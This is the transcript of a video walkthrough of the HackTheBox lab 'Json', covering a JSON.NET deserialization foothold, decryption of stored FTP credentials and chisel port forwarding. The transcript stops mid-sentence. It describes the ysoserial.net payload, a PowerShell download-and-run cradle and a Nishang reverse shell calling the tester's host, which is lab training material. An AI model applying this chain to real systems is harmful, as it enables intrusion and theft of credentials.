What's going on YouTube? This is PSEXEC. I'm doing JSON from HackTheBox, and this box is probably easier done on Windows than Linux because the initial foothold and 2 out of the 3 PrivEscs require Windows. First off, the initial foothold is a .NET deserialization, which unfortunately I'm not super familiar with .NET deserialization like I am PHP and Java, so we're just going to be using the tool ysoSerial.net to get us code execution on the box, and once we're on the box, the first 2 PrivEscs will be done from Windows. The first one being decompiling a .NET application to see how it decrypts a config file. The second one is running FileZilla's Server Manager application after doing some port forwards to create a new FTP user. And then the third PrivEsc we can just do from Linux. It is just juicy potato, so that's super easy. And I've said a lot, so let's just jump in the box and start doing it. As always, we begin with an NMAP, so -sc for default scripts, SV enumerate versions, OA output all formats, put in the NMAP folder and call it JSON, and then the IP address, which is 10.10.10.158. Can take some time to run, so I've already ran it. Looking at the ports, we have a ton open. The first one being is FTP on port 21. NMAP says it's FileZilla FTPD, and the only script it's giving us output for is FTP-syst. And NMAP only shows the output of scripts that actually run successfully. If it doesn't run successfully, you don't really see it. Because if it showed you all the scripts it runs, you'd literally be like denial of service with information. So there is one thing I always like testing for with FTP, and that's anonymous authentication. So going FTP 10.10.10.158, I'm just going to try logging in with anonymous, and we get the password is incorrect, so anonymous authentication is disabled. However, we learn one new piece of information, and that is the FileZilla version number. So I'm going to go over to cherry tree, Control-N to create a new node, Control-Shift-N to create a new child node, and I'm going to mistype interesting and just leave it that way because I don't feel like going back to rename it. So the next thing we have is HTTP on port 80, and we see it's telling us Microsoft IIS HTTPD 8.5, and I believe this is Windows 8/2012, and probably R2 since it's a .5. We have the HTTP title being JSON HTTP, and then a bunch of RPC ports being open. On 445, NMAP is saying it's either Windows 2008 R2 or Windows 2012. So let's see if we can just answer this question right now by Googling Windows IIS versions. So I'm going to go to Google and type Microsoft IIS versions, and it's going through burp, so let's turn burp off. Okay, enter, and we see, let's see, this page, and it was last updated 2017, so there's probably a newer article that has later operating systems, but we can see 2008 R2 is 7.0 and 7.5, and 2012 is 8.0. I'm guessing 8.5 will be R2. So we know right now this is a Windows 2012 box, which I believe is end of life. So potentially a PrivEsc. New extended support is 2023, but I think if you don't have extended support, you don't get patches. So let's just move on with NMAP to see what else there is. Host scripts, we have a clock skew of about 4 hours, so if we do Kerberos stuff, make sure we sync the time. Net BIOS name is JSON, so if we don't get a web page, we can try putting this in our host file, then going to HTTP JSON to see if there's some type of virtual host routing that gives you a different page. So let's do host name JSON and move on. We have message signings enabled but not required, so probably SMB relay attacks would work if we have a second machine to relay an authentication attempt to, and that is about it for NMAP. So let's go take a look at the web page, going to 10.10.10.158, and while that loads, we can do one last thing, and that was run SMBClient-L 10.10.10.158 just to see if there's any type of OpenShare. And when it asks for the password, just hit N, and we can do -N for null authentication, I think, but you don't really see that nowadays, so you can normally ignore that. We don't have anything, so let's go take a look at the page, and as soon as I went here, it's redirected me to /login.html, Whenever pages do redirects, I like looking very closely at the page to see if they're trying to hide our eyes. So I click the X to stop loading the page so we can take a look at this. And we see the copyright is 2019, so probably not a vulnerability in like a web package or something, because that is the year this box was released. We can see this may happen because we stopped the refreshing the page. There should be some type of JavaScript or something that renames this to be the actual username. We get a bunch of dead links here, or dead images. So I'm going to press Control U and see if we can find those. Actually, we can do F12 for inspector, or develop mode inspector, and then click here and see if we see where that link is supposed to be an image to. I don't see it right away. Let's just do the networking tab, reload the page, click X before, oh, I guess it already tried to redirect us. There we go. So looking at this, we see a bunch of 404s. So this is interesting right now. And normally when I see 404s, I like looking in to see exactly where the URL was, because sometimes it directs you to a host name that you just don't have DNS to. But in this case, it looks like the file just doesn't exist on the server at all. So we get a 404 not found. So we can put this in notes, dead links everywhere. And I can fix the host name to be, or hosty name to just be host name. So let's take a look at the login page. So /login.html. Actually, before we do that, in this source, I was just looking for like WordPress or Joomla. I'm not sure if I said that. But looking at the login page, Control U, and we don't see anything too interesting. So let's try logging in with just admin. It said email address, but we haven't leaked any email addresses yet. If this was SSL, this is just saying not secure because it's HTTP. But if 443 was open, you may get like an email address out of the SSL certificate, or at least the domain name. So you could then guess like admin at domain name. But since we don't know anything, I'm just going to try admin and guess, things like that. I'm going to send this over to BurpSuite so I can see what the login request looks like, because that is always interesting. We see it is JSON, so content type application/JSON, and we're sending the username password. I'm just going to send this over to repeater to see how the server responds. And we get a OAuth 2 cookie. So let's see exactly what this is. Echo-n, paste this, base64-d, and we get a cookie that has a bunch of JSON. So the cookie is kind of staying true to the box's name. And there's one thing I forgot to do that I always like doing, and that is having some type of recon going in the background while I work. So I'm going to do GoBuster-u, HTTP 10.10.10.158-w for word list, user share word list, DurBuster, directory list 23 medium.txt, -o for out file, and all we see right now is .html. I'm going to try like index.php. We have to turn BurpSuite off. Doesn't look like that wants to load. Okay, 404, ASP, 404, ASPX. We get another 404. So we don't know exactly what extension this is processing, so I'm not going to do the -x flag in GoBuster. So I'm just going to log it to GoBuster root.out. And we forgot to specify the mode, which is dir. So rename this tab to recon, and we can keep on going about our business. So let's just forward this request in BurpSuite to log in with admin and see what happens. So now we have logged in, we are admin, but we don't really have anything we can do. Like, this interface didn't change. If we go to like /admin to see if this exists, we get a 404. Maybe GoBuster will help us eventually, but right now we're kind of at a dead end. So I'm going to open up Firefox again, refresh, and see exactly how everything gets generated. Because maybe like this number is an API request or something from a browser, and we can see it. So refreshing the page to look through everything that's loaded. We can probably filter by status, because we only want 200s. And we do see a /API/account. So let's try going to /API/account and see if we can figure out how this API works. We just get authorization has been denied for this request. So what I should have done is looked at exactly how this request works. And if we have everything going through BurpSuite, that's much easier to do. So let's just go to target. We can click here and we can see everything it's doing. So there's an API/token, and that's, I guess, potentially how we log in. So if I go back to this repeater tab, yes, we logged into API/token. So what I really should have in GoBuster is GoBuster-u, dir-u, HTTP 10.10.10.158/API, W for word list, and we'll do user share. Do I not have SecList installed? Oh, no, I do. SecList, discovery, variables, secret keywords maybe. I don't know exactly what's in this. There's probably a good word list in SecList that has variables. Not exact. Web Content API. My VM froze. Or my terminal froze. That was weird. Discovery, Web Content API, actions. That can be a good one. Or not. Let's see exactly what this is. Add. So I'd probably run through a bunch of these to see if we get anything extra while I look through. So going back to the sitemap, we do have the account, and the response. The request is just this. Let's just send this. And that is what we get. What was different between these two requests that we sent? So API/account was a capital A. So what I'm going to do, go to proxy, intercept, refresh, send, and I want to compare these two API requests to see what is different. So both of them contain the OAuth2 cookie, but this one, through the API, contains something called bearer. And I'm actually not too familiar with this, so let's go over to Google and see what this header is. So I just Google HTTP header bearer, and we see it's some type of authentication in Swagger. I'm going to Google swagger.net to see if this is a .NET thing. Swagger, also known as OpenAPI. So in this, I may create a new tab called Research, Swagger, and we need to research the bearer token to see exactly what that is, because it's just something that's unfamiliar to me. So let's go and take a look at exactly what this contains. So I'm going to send this request to make sure we can get a response back. Okay, there we go. And it looks like this is the same exact thing as our OAuth2 cookie. So let's copy this, and we can do echo-n, paste, base64-d, and we just get the same exact output as our OAuth 2. So if I wasn't already an administrator, I'd try playing with changing this, because the one thing I'm noticing in this cookie is there's no secret signing type of thing. The password, if we do echo-n, paste this, wc-c, 32. So I'm guessing that is just the hash of, or MD5 sum. So let's try echo-n. Yep. So this is the MD5 sum of the password, which is admin. So that's definitely something I'd probably note in a report saying, your passwords are being sent in MD5 or something. Let's see what happens if we just give this bad base64 in the bearer. So if we just send it, please subscribe, we get an error message. And error messages are always good to see in web applications because it kind of gives you an idea how this is working. Message, an error occurred, invalid format base64, exception type, nothing. We don't get a stack trace. So what happens if we give it some base64? So echo-n, please subscribe, and we'll do base64 and give it this. Paste. And the reason why I wasn't trying this with the cookie is because it wasn't giving us a response back. This is directly taking this input. So we get a response back from it, and we get an error has occurred, exception message, cannot deserialize JSON.NET object. So if I Google around for JSON.NET exploits, and when I see deserialize, I always look into it 100% because it should never serialize some type of user input, and it's deserializing our HTTP header of bearer. So if we Google JSON.NET object exploitation, OWASP, JSON marshals, we get ysoSerial.net. ysoSerial is a deserialization attack framework for Java. ysoSerial.net is a deserialization attack for .NET. And if we look at this, JSON.net is within this list. And we got two different gadgets that this jumps to. So the very first one was the object data provider. So if this gadget doesn't work, then I'll try the next one, which was the Windows identity. So this is a Windows program, so we should probably run this on Windows. Whenever you do deserialization attacks, it always helps to do it in the same language it's written in. If you don't really understand it, just look at my PHP videos of deserialization. We'll kind of explain how it works and why you should always be in the language. So I'm going to switch over to Windows now to create our payload. Now that I'm on Windows, and this is the Commander VM from Mandiant, there's probably instructions in one of my videos for installing it, but it's relatively straightforward. If you just go to Google and search for like Commando VM Mandiant, you got this page and it's got install instructions here. So I like this because it puts a bunch of tools straight on our list. I'm going to search maybe .NET. I only see ILSpy. Maybe search Kali. No. Let's see. Maybe exploitation and search for ysoSerial. We don't have anything, so I don't think this is part of it. We can also do like Choco search ysoSerial to see if there's a package for this. And I don't know what that error message is. Quit. Okay. So we'll see if this comes back, but ysoSerial is actually not part of this VM. So we have to go get it. So I'm just going to GitHub ysoSerial.net, and we can go here. I don't know why that search isn't working, but it's not needed. I'm just going to make dir GitHub And we can go into it and do git clone, paste. And it should be noted, like we could do it and put it in tools or wherever this stuff should be located. However, I hate just putting stuff here because this is where like the package manager for Commando loads things. So I always like storing it in my own location. And then if the package manager ever supports this, then I can delete it from my location and use the package managers. So that's kind of why in Linux, everything I do is under /opt because the package manager doesn't put things there. So we do have the ysoSerial directory, and this is something you should compile yourself. There is this release, but I think the release is in debug, which doesn't statically compile things, so you'll get a bunch of dependencies errors. We can try it real quick. So if we copy everything, and we can go in here, ysoSerial, we can just create the directory, release, and see if this works, but I'm going to go on a limb and say it won't. So if we go in release and execute it, we get a weird dependency error. So let's delete that and then compile it ourselves. I really should have made this text bigger. Oh well. Let's open with Visual Studio 2019. And then we will just compile. So I think it's open now. It didn't load program.cs up on the window for me, but it's not needed. I can change the build to release, rebuild solution, and I'm going to build the debug one as well to see if it also gives me the dependency errors, just because I'm curious and this is open. So now we got the both of them. If we go dir, they're stored within ysoSerial, bin. Let's go debug. We can try to execute. Oh, it put all the DLLs for me. So it doesn't matter because if we look at this, we have a lot more DLLs than we did before. So like Newtonsoft, and I think this is the one that was erroring before. Do we have the error message still? Initializer. Yeah, ndesk.options was the error message. What font size is this? 16. Let's do 20. So, and that DLL is here. So we have all the DLLs needed to run ysoSerial. So let's run it. And we need to specify the gadget, the formatter, the output, and the command. So gadget, formatter, command, and output. And output can either be raw or base64. I'm going to do it in raw and then base64 it myself, just because that's how I like doing it. I like being able to read the payload by eye and then go for it. So the first gadget we have is object data provider. So -g, object data provider. And then the formatter is going to be JSON.net. Is it a capital N? I think it is. What is it? Yep, JSON capital N. And then the command I want to run, I always like doing ping first. So ping 10.10.14.2, I believe. And Windows is -N1 to ping once. Let's go to HTTP. And if config ton0, 10.10.14.2 is my IP. And then -O for output, raw. If we did base64, I mean, I bet you can guess what's going to happen. Oh, I typoed base64. There we go. I was like, I did not expect to see unbase64 output. But the one thing I am curious is this going to be formatted UTF-16 little endian or not? But we will be able to check that out. So I'm just going to copy that, go back to my VM, make dir deserialize and go in here, and v ping.ser. Paste that in, and we can see exactly how this works. Method name, start, method parameters, system collection array list, ms score lib, and we can see it's running cmd/c and then our command. So we don't actually have to use ysoSerial every time because I don't see anything really customizing this. We should be able just to edit this. And what I meant by customizing, if you went back in like the PHP deserialize, there's a bunch of things that had like the length of arguments and things so it could rebuild. This doesn't have all those lengths, so it's easy enough to just hot patch it and change this line. If you wanted to see what the other one looks like, Windows Identity, I think it was, we can look at this real quick. So Windows Identity and format. Is a lot more confusing. So system claims ident, bootstrap context, and then a bunch of base64. If I copy this base64 and decode it, I have no idea what's going to happen. Base64-D. It's a bit more of a complex object, I'm guessing. Delegate serialize holder. Yeah. Since it's formatted weird, I don't want to go into this. Eventually, I'll do a video on .NET deserialization to understand how all this works, but I don't understand it good enough to explain yet. So what I want to do is base64 ping.ser, and it's ewog. Go over here and ewok. So this looks like it is going to be UTF-16 little endian. So if I echo -n, paste this, base64-d, xxd, it is not. It's just 7b, maybe different line terminators. So 7b0d0a. And if we do cat ping xxd less, we have just 0a. So we have a different line terminator between the two. So if we have error messages, make sure we take the base64 out of commando and not out of our thing. So I don't think it's going to be an issue. However, those little small things do become huge issues. And it wouldn't surprise me if you're taking like the offensive security exam and a little thing like that actually makes a whole load of difference. I haven't actually taken the offensive security exam, so I don't know, but those are the type of things they like to do to make sure you understand exactly what you're doing. What I'm doing right now is just setting up a tcpdump on ICMP, and we're going to paste our base64 into the bearer tag. Send this. We get an error message, but we get a ping. So we have validated, we have code execution. So the one thing that's going to be a small issue running commands is this uses single quotes. So if I tried like my IEX payload, which requires putting the URL within single quotes, we're probably going to have an issue. So whenever my like PowerShell payload requires single quotes, what I do is just do the PowerShell encoded command thing. And that requires it to be UTF-16 little endian formatting. We could base64 it on Windows, but it's a pain to base64 on Windows compared to Linux, so I'm just going to do it here. So echo-n IEX new object net.web client download string HTTP 10.10.14.2, and we'll call this please subscribe.ps1. And if we xxd this, I forgot to terminate a quote. You can see, let's do head 2, what this looks like. So this is not in 16-bit format because I is ASCII 49 and E is ASCII 45. So if we do a iConvert to the target UTF-16LE XXD head-2, you can see what that format looks like. So this is how Windows likes it in 16-bit little endian format. So we have I, then 00, E, 00. Next thing to do is base 64 -W0. I'm going to pipe echo afterwards, so we have a line break. IX new object net.webclient download string. That all looks good. So now instead of ping, we can do PowerShell -encoded and you could also probably get rid of this CMD and then just put PowerShell there, but let's try this. Base 64 run me -W0 echo copy, and we're going to make dir, actually over here, make dir dub, and then we'll call this, we'll copy user share Nishang, and then shells invoke PowerShell tcpdump, and we called it please subscribe.ps1. Then edit this to put a command at the bottom. There we go. And the IP address we want is 10.10.14.2. And the port will be 9001. So we can do python 3-m http.server80. So now we have a web server running. And then we can just do nclvmp 9001. Go over into burp, and we'll paste the runme.serialized output. Click send. We get an error message, but the shell has returned. If we look on our pane 2, we do have the server doing the get on please subscribe.ps1. So I'm going to rename this to be servers, and then 3 is going to be shells. So the very first thing I like doing is probably running the WinPEAS. That's Windows Privilege Escalation Awesome Suite. And the way I'm going to do it, instead of putting a bunch of files on the server, is to mount a drive. So what I'm going to do is make dir SMB, cd SMB, and we can do mpacket SMB server -h. And I'm going to specify a username and password. So the username is going to be IPSEC, and the password is going to be, you guessed it, please subscribe. And the reason why I like putting passwords in my SMBShares is, number one, I hate when people just mount it and download all my contents. And number two, there are Windows group policies to prevent clients from ever mounting SMB without credentials. So this gets around both of those issues. The share name will be Patreon Rocks. And then I'm just going to put my current working directory as the share path. So in order to mount this, we have to create a secure string in PowerShell. So we'll do $pass is equal to the password, which was please subscribe. Did I put this in caps? I did. And then we'll do convert to secure string dash as plain text dash force. Look at this. Okay, that looks good. And now we can create a credential object. So new object, system management automation .ps credential, username IPSEC, and then the password is that variable. Look at our object, that looks good. So now we can do new ps drive dash name IPSEC And this could be just like y colon, it can be anything. This is the drive name. So -name ipsec -root 10.10.14.2 / Patreon rocks. If you don't support me on Patreon, you really should. So -credential cred -ps provider file system. So it looked like it's a lot of work, but now this just saves a bunch of time. So I can do cd ipsec colon, and I am in this SMBShare. So if we go back to our box and go in SMB and then drop that binary in this, we can execute it, and when we write to a file, we just immediately gain access to it. So we don't have to worry about dropping things on the box itself because everything's going over SMB back to us. Opt, that's not it. CP opt, privilege escalation awesome suite, WinPEAS. We'll do the exe. And then I think it's WinPEAS again. Let's just go in here and do a find. Find grep exe $. So we copy the x64 release here. If I do dir, I can just magically execute this. So WinPEAS.exe cmd fast. If you don't do this, it may take a while to run. And I'm going to direct this to WinPEAS fast.txt. So if I do ls in this, we just magically have it. So I can do tail-f so we can read the output as it goes out. And the main downside to, I guess, WinPEAS remotely is I have a lot of trouble getting it to display colors on Windows. But other than that, it's not needed. And by colors, I mean if you go WinPEAS and look at it, maybe exe, it should output like this in nice, super pretty colors. If we had like an actual command shell. So I'll look into how to do that with reverse shells, but it's not too needed. I'm going to fast forward the video, let this run, and then we will go over exactly what it finds. So now that it looks like it's done running, we can go to the top and see exactly what this tool runs through. So the legend, not going to be too useful because we don't have color. But we got the host name is JSON, the product name, which is Windows Server 2012 R2 Data Center, so we were correct there. Processor account 1, keyboard language is in Spanish. So this would be useful if we want to like crack any passwords or anything. We should take a note. It may be Spanish users, so probably use Spanish word list. Current time and time zone is Eastern. OS build number 9600. And let's see. PowerShell. Windows Event Forwarding lapse. So Windows Event Forwarding, nice to know because if they are, then you can potentially have Splunk or something else, so you know to be a bit more stealthy. If they don't have Windows Event Forwarding at all, then maybe ignore it. And also check for custom services that do it. I can't remember that off the top of my head. WinLogBeat. WinLogBeat is the custom service. Lapse, environment variable, system environments, internet settings, nothing useful. Drive information, nothing useful. UAC status. Users on the box. So we have JSON administrator, JSON super admin, and user pool is for IIS. So we have a user on the box that's non-default, which is super admin, definitely interesting. We have the SE impersonate privilege. So probably juicy potato will work. So let's do interesting. And we can just copy this. So there's one potential PrivEsc, RDP sessions, event logged users, Auto login credentials, username superadmin, doesn't look like it has a password. Home folders, so .NET. Password policy, so we can see it doesn't have any I don't see it actually. I was gonna see for like attempts before lockout, but maybe it errored right here. You can see the password complexity, so you know to test for things like password because there is no password complexity requirement. Weird access denies. This is going to be installed applications, and one of the applications is sync2ftp, and this is interesting because if you remember, there is a FileZilla service that we haven't really looked into. So sync2ftp could be useful. Schedule applications, network shares, all the default ones. Ports, we have something listening on localhost, so this would be something else to look into. And this one's unique to me because we saw all these with NMAP. This is how like Windows RPC does ports, but this looks like a custom service. Firewall, it is enabled. Current profile is public though, so there is no firewall. A bunch of DPAPI and credential files, so this is stuff you should probably download. You generally won't see it on HackTheBox, but on Pentest, you'll definitely see it. Same with like saved Wi-Fi credentials. Browser information stuff. I think we're getting into nothing left really. Cloud credentials, and that is it. So, going back to our shells, we could just go straight off and juicy potato the server, but we've done that like 100 times, so I'm not going to bother with that right now. We will eventually. That'll probably be the last PrivEsc path we do, but I want to look into that sync2ftp. So cd/program files, and then sync2ftp. And we have a SyncLocation.exe and config. We can just copy both of these to ipsec:, and then, like magic, they're now on our box. So let's look at the config. SyncLocation.exe.config. And we have the user and password and a security key. So I'm guessing if we just echo, well, let's try the username first. If we can't base64 this to get a user, we know it's somehow encrypted. So echo-n base64-d, and we get a bunch of junk. So we can Google sync location. Is it sync2? Nope, sync location decrypt. And looking at this, I don't really see anything. SyncLocation.exe decrypt. And no. So what I'm going to do is open up a file browser, and we will try to decrypt this or decompile this on Windows and see how the decryption works. So Windows, HB, boxes, JSON, SMB. And I could probably just mount this on a Windows machine, but I have my VM currently in NAT mode, and NAT is always weird between things, so don't know if that would work. So I'm going to try to copy and paste it over. So new folder, JSON, paste it in, paste, does not work. Copy. No paste. So let's see. If config ton0, not ton0, eth0, copy, and we'll see if this works. I doubt it will. I'll probably have to pause the video and get out of NAT mode. /Patreon rocks. can't connect to it because it's not secure. Oh, this needs to be SMB3. Let's see. Mpacket SMB server-h or SMB2 support. Add that. I'll probably have to reconnect this in the actual Windows server, the shell. So we can access it. And wait. Oh, the password to this VM is actually please subscribe. So it just automatically logged in. That's why I was confused. Like, wait a second, I have authentication enabled, but nope, I just created the same exact password on my Windows VM as not. So it was able to authenticate magically. That's actually funny. So have those copied. We can begin looking at them. The one thing I want to do, because I know I'll forget, is see if our shell still has access to IPSEC. dir. Okay, so we didn't lose access even though we restarted the service. Good to know. So let's go back over to Windows. And what we want to do is take SyncLocation.exe, which I forgot to copy, but decompile it and see how it decrypts information out of this config file. So let's go and copy SyncLocation.exe. And then we can go and decompile it. And to do that, I want to use the tool DNSPY. So .NET, and we only got ILSpy. C:\tools D. We don't have DNSPY. So let's install it. So how you install packages is open a elevated command prompt. I went to PowerShell and did Control-Shift-Enter. You know it starts elevated when you're in System32. And you can do chucko install DNSPY. You can also use, I think, CINST, but it is the chocolatey package manager. And sometimes I find it doesn't give you output when it asks for a question. So just roll the dice and hit enter if it starts hanging. But we're just waiting for it to actually install. And there is the search command. So if you do the same thing, choco search DNSPY, it will tell you if it exists. And it's a lot slower than any Linux package manager. So here we go. It is installed, and it has successfully installed it. So software installed to program data chocolatey lib DNSPY tools. Did it copy it to tools directory? .NET. I don't see it there. C:\tools. DNSPY. Don't see it here. Maybe CINST. DNSPY. Normally, I think it automatically puts it in like your tool directory. So I'm installing it this way with cinst. And maybe this way it works. Software installed. DNSPY. It's not there. That sucks. So let's go to this data. This literally wasn't working yesterday. It looks like they just updated the repository for a new version. So maybe it's not like completely fixed yet. So we have DNSPY here. If you wanted to use ILSpy, we can go over that real quick. And I can just show you why I prefer DNSPY. That's ysoSerial. Tools. .NET. ILSpy. It's pretty much the same thing, except DNSPY is going to let us do one cool thing, and it works better on like obfuscated stuff. But go to users, IPSEC, desktop, JSON, SyncLocation. We can see it decompiles it. We get like program here. We can see the source code. And going around here, clicking, we found copy, and this is the decryption utility. So it does crypto.decrypt cipher string. You can look into decrypt to see how it does it, but we can't edit anything. So you could probably save this to like a Visual Studio project and then edit it that way. Can you? Before I say that, right click. I don't know. I'm sure you can. That seems like a useful feature, but DNSPY does all that 10 times better. So opening this up, we can do File Open and go to our desktop, users, IPsec, desktop, JSON, SyncLocation. And I'm going to edit, no, view, options, font. Let's change this to 18. Okay, that should be fine. So all the same exact things as before, except you'll notice if I do program and right click something, I can edit the method. And that lets me edit this code and recompile it, which is super handy. So if we just try running this, we get a weird error message. It needs a service. It just can't work at all. So what I want to do is edit the method, and we want to put a print statement just before it. So I'm going to do message box, and message box is not loaded yet, so that will be in the using system Windows forms. So now you see that went from red to green, so we know this is a loaded method. So Windows show, please support me on Patreon. So if I click compile, and then we do file, save all. Okay. And now I'm going to execute this file again. I really should have made a backup copy, but I got the backup copy on Kali, so it's fine. We get the message box. So what we want to do now is put the decryption code. So let's go into this service 1 and click around until we find the decryption. And we can see it here. So let's copy, go back to main, and we can edit the method, paste, and we can make this prettier if we want to. Can we just do tab to tab that all? Yep. So we want to show username and password. So we'll do show username plus colon plus password. And we see everything's in red, so it doesn't know where these are. For the flag, we can probably just get rid of that. And this one is, I think, system.configuration. Using system configuration. It is. And if you did not know that, you could have went back to this, and when you do like edit method, you can see everything it's using. So out of all these, system configuration's probably the best. If you save this, I think there's a way to save this into like a Visual Studio format. Visual Studio does a better job at recommending the libraries to be used, but I digress. Let's just file, save all, and run this now. And we get superadmin : funny HTB. So we finally get creds, and since this program's called sync to FTP, I bet they're FTP creds. So if I typed my password incorrectly, we could log in to Kali again, and then FTP 10.10.10.158, superadmin funny HTB. We get logged in, we can do dir, and it looks like we're in a home folder. If we do cd desktop dir, there is root.txt there. So we could also potentially go and edit his like PowerShell configuration files or whatnot, or not configuration, like PowerShell startup or environment. So he always executes PowerShell. My bad. We could edit his PowerShell startup or like his bash RC equivalent to PowerShell. So when he opens up PowerShell, it runs our code and gives us a shell. But since there's no like user running PowerShell here, editing that file won't really do anything. So try like cd ... again to see if we go up yet another directory. We can't. So I think that may be it. However, why don't we try like PSEXEC super admin at 10.10.10.158? PSEXEC.py is it? Impacket PSEXEC apt install PSEXEC. Locate PSEXEC.py. cd opt impacket examples PSEXEC.py. There we go. Super admin at 10.10.10.158. Funny HTB. Requesting shares, and both of those aren't writable. However, I bet if we go into our shell, we can use like Invoke-Command to make this user run something. So let's do that. The first thing is to create the password environment or password variable. So pass equals convert to secure string funny HTB as plain text force, and then create the credential object. So new object system automation management PS credential, and the user is going to be super admin, and the password is what we just created. Verify that assembly is loaded. Cred equals new object system.automation.management.ps credential. Super admin pass. Oh, what did I screw up? System. Let's see. System management automation. So I have those reversed. Cred equals new object system management automation PS credential super admin pass. There we go. So we can do host name, because PS remoting likes having proper host names, which is JSON. So invoke command dash computer JSON dash credential cred dash script block. Who am I? Run this and see if it works. Oh crap, I have a typo. Credential cred. Let's see. Exit NC LVNP 9001. Go all the way back to burp. Send this. Do we get the shell? We did. Because I don't know how to kill that. So going up, we can just copy these. Copy. Paste. Copy. Oh, that's not the one we want to copy. Oh god. Okay, go up here. Wait a second, and now hit down. What it kept happening is I kept telling tmux to go up, and then hit down, and it immediately went down. So, this is what I want. Copy. Paste. I really need to find a way to get a proper terminal on Windows, so I can Control-C things without killing my whole shell. Cred dash script block. Who am I? Access denied. So maybe that one doesn't work. JSON pass. Let's see. funny HTB. Let's make sure that's correct. Super admin funny HTB. I just hit Control C there to see if I could copy that output. So maybe that's not a user on the box. super admin. So what if we give it a bad thing? Because if this says like invalid password, then I know I can just give up. If it doesn't, then maybe I have something wrong. We still get access denied. So we don't know if that's the password for the local user or not. But I guess we can try running one thing from Windows, and that is evil winrm. So do we have this in apt search evil winrm, Google evil winrm, because maybe we're just using everything wrong. So this is doing Windows remoting from within Linux. Git clone cd evil winrm, and we need to install it. Does it have instructions? Help, requirements, quick install, gem install evil winrm. And then we just do this. So, evil winrm, the IP, 10.10.10.158, -u, superadmin, -p, funny HTB. Let's see if this works. Invoke-Command, -credential. We should fix the credential to be valid. I just want to try doing this without the -computer name. So Invoke-Command, still failed. Get an authorization error. So maybe this user is not allowed to go in through Windows PowerShell. I guess the last thing we could probably do is like SMBmap -u superadmin -p funny HTB -h 10.10.10.158. And we get no access, which means he passed auth. So if we just do funny, we get authentication failure. So we know we have a way to a valid credential. We just don't have access to PowerShell remoting. The last thing we could do is -i instead of the IP. We could try it with the host name. So let's exit with Y and edit our host file to put the host name in. Then add the line 10.10.10.158, and the box is JSON. We can ping it to make sure we have the IP correct, and then just change this IP out for JSON. Since we know the user is an admin, if this doesn't work, we could always try switching over to like Metasploit and then injecting a VNC service and then just doing it through the command line. We can also use programs like Cobalt Strike, or I think Metasploit does it. Cobbler, I think, is another one. Pretty much any C2 tool is going to give you the ability to do like a create token command, and you can do it that way as well. Just doing it through PowerShell is a bit of a pain to do it, so I think that's why we're having an issue. I switched over to this shell for something, but we can see it errored out again. Oh, I want to do net local group administrators. Let's make sure superadmin, yeah, he is a member. Okay, so I'm not going to bother with all of the VNC stuff because thinking about it, it may not work because there's no interactive sessions on the box right now because according to WinPEAS, there's no one logged in. So maybe we'll try it at the very, very end. But right now, let's move over to the second way to do this box because we covered the first one. The first one was just getting this password, then FTPing in and downloading root.txt. And at that point, you're done. But you didn't get a shell in the box, and not getting a shell isn't satisfying. So if we remember going back to the notes, we do have this one weird port, 14.147, and let's forward that over to our, thing about this, I'm going to have to do this one from Windows. So let's kill our VPN on Kali, then switch over to Windows to start it back up, because HackTheBox doesn't support running multiple instances of OpenVPN. So now we're starting it up. Once that goes green, we should be able to ping 10.10.10.158. And it's going. There we go. We just went. So now probably the next ping will work. There we go. And now we have to go and redo everything. So let's get an instance of a web server running on our box. So we're going to make the directory www. And I'm going to go to c:/tools, Nishang, and we're going to copy the reverse shell here. So copy invoke PowerShell TCP into the www directory. Then we can edit it with sublime.txt. And what we want to do is copy the reverse line to the very bottom, just like we did on Kali. So 10.10.10 or 10.10.14.2 and port 9001. So we can save this, and then we want to rename this to be please subscribe. I'm going to open up a PowerShell, and unfortunately I don't have tmux on this, so it's going to be messy, but oh well. Desktop JSON www python-m http.server on 80. Okay. So now what we have to do is start up netcat. So PowerShell nclvnp 9001. We got that loading. Let's go to Firefox and log into this guy. So 10.10.10.158. And that should redirect us to login HTML, admin to log in. And then I don't think we need burp for this. I think we can do this just through Firefox. So it says API account, edit, resend, and this bearer, that was from our Kali box. So cd was it deserialize, and then base64 runme.sir. Copy, go back, paste, then click send, and we can double click the thing, look at the response. We see the error message, but we don't see a shell. Doesn't look like it got it, which is weird. --bind 10.10.14.2. And we can resend. There we go. I'm not sure why I need to do the bind. I guess sometimes Python web server doesn't bind on all sockets on Windows. No idea. But now we have a shell. So what we want to do is get chisel on this box. And we want chisel so we can do that remote port forward, because we need to get, where's cherry tree? Here, we need to get this port listening on our Windows box. So I don't think we have chisel installed on this. It's kind of a I don't know of many people that use it outside of me. Well, probably a lot of people now that I've shown it in videos, but let's do GitHub chisel. Okay. PowerShell, cd, desktop, cd, GitHub, git clone, and then cd chisel. And we want to go build. Because I don't think they have a release. Oh, they do. We could have just done this. Oh well. It's built now. /chisel.exe. Awesome. So now we can copy this into a www directory. So c:\users ipsec desktop json www. And we can go to the reverse shell and find a place we can write. So users public music echo test to t. We can write here. So we can do wget 10.10.14.2 /chisel.exe dash out file chisel.exe. Hit it here, hit enter a few times. Sometimes, like, the Python web server gets hung up and you just have to go to it and hit enter. That's what I did. So we can do /chisel.exe -h, and we have chisel running in both the client, or both ends of the connection. So what I'm going to do is we have echo server here. Well, I wish I could title these windows. I'm really lost without tmux sometimes. CLS, CLS. Okay, we can't clear this because the term variables and whatnot, but to the left side is going to be a reverse shell. This is going to be a server. And if this doesn't make sense, I'd recommend watching the Reddish video. That's REDDISH, because that's where we go over port forwarding and all this type of stuff. And we use chisel. So we got to start the chisel server. So we're going to do chisel server -p 8000. Actually, I'm going to do -h because I want to see how to set the host. So probably --host and --port. So we'll do chisel --host 10.10.14.2 --port 8000, and we want to allow reverse connections because what we're going to be doing, let's see, MS Paint, we have us, the server, and then a service. So this is us. This is going to be JSON, and this is FTP. So we want our port to go from us to JSON, and then from JSON to FTP. So this is a reverse connection. It's explained better in Chisel. Go watch that. So start this command, and then we can go here, /chisel.exe client, and we want to connect to 10.10.14.2 on port 8000, because that's what we set Chisel up to. And then the port forwarding rule we want is r:14.147, 127.0.0.1, 14.147. Hit enter, and hope it connects. Doesn't look like it's connecting. Come on. Chisel server host 10.10.14.2. Let's see. Oh, as soon as I hit Control-C, it connected. Hopefully it's still connected. CMD, netstat ANLP, AN. Let's see. We can just do find string 14147. Okay, we're listening. So we're good. So lesson learned, whenever you start a server on like a command prompt in Windows, if something's not working, hit enter because that magically fixes it. So now we got to download the FileZilla server. So if you just Google FileZilla download, you can come here, download it, save it, and then open it. I agree, install it. We don't want to start the service. I guess do not start the service. If user logs in, start manually. We can start the interface after setup completes, that's fine. All we 